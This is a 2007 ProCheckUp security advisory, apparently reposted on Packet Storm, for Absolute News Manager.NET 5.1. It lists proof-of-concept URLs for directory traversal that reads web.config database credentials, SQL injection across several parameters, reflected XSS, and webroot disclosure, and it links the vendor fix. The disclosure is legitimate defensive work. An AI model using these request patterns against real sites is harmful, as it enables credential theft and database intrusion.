what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ProCheckUp Security Advisory 2007.39

ProCheckUp Security Advisory 2007.39
Posted Dec 6, 2007
Authored by Adrian Pastor, ProCheckUp, Richard Brain, Jan Fry | Site procheckup.com

Directory traversal, cross site scripting, and SQL injection vulnerabilities exist in the Absolute News Manager .NET version 5.1.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | c20201b4d8c8d24e7310c36b1d34160f498e4b267278ba9e50ad2889cd7016c1

ProCheckUp Security Advisory 2007.39

Change Mirror Download
PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection

Vulnerabilities found: 16 November 2007

Vendor informed: 19 November 2007

Vulnerability fixed: 28 November 2007

Severity: High

Description:

Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:

- unauthenticated file retrieval (directory traversal) on '/pages/default.aspx'

- unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly '/pages/default.aspx'

- XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'

- webroot disclosure on 'getpath.aspx'


File retrieval PoC:

The following URL shows the contents of .NET 'web.config' (contains DB credentials):
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config

The following URL show contents of the vulnerable script:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00

Note: in order to obtain the content of '.aspx' files, a null byte '%00' must be added after the filename.

Show content of other scripts:

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00


SQL injection PoCs:

Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx
Vulnerable parameters: z, pz, ord, sort

Requesting the following URL returns the version of Windows and SQL server:

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&

System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

Other URLs:

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&

The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has not been confirmed.

Requesting the following URLs:

http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999999999
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&z=1

return the following error:

System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.


XSS PoCs:

Vulnerable script: '/xlaabsolutenm.aspx'
Unsanitized parameter: 'rmore'

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y

Vulnerable script: '/pages/default.aspx'
Unsanitized parameter: 'template'

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E

Webroot PoC:

Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot - ie:

http://target.tld/[CustomerDefinedDir]/getpath.aspx

"
Absolute News Manager Physical Path :
D:\inetpub\target.tld\[CustomerDefinedDir]\

Please delete this file from your installation.
"

Consequences:

Contents of any files on the web server can be obtained. Unauthorized SQL queries can be injected. Scripting code can be run within the security context of the target domain. Information about the target environment can be extracted.

Fix:

http://www.xigla.com/security/
http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip

Note: ProCheckUp has NOT tested the patch provided by Xigla Software.


References:

http://www.procheckup.com/Vulnerability_2007.php
http://www.xigla.com/absolutenmnet/


Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks Xigla Software for working with us.
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    8 Files
  • 6
    Jul 6th
    8 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close